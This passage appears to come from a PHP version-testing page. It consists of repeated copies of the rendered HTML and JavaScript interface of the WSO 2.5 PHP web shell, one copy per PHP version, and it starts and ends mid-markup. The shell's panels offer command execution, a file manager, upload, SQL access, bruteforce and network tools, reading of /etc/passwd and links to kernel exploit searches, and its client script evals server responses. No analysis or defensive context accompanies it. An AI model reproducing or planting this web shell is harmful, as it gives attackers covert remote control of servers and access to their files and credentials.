d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.4 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.3
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.2
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.2 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.1
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.1 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.0
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post 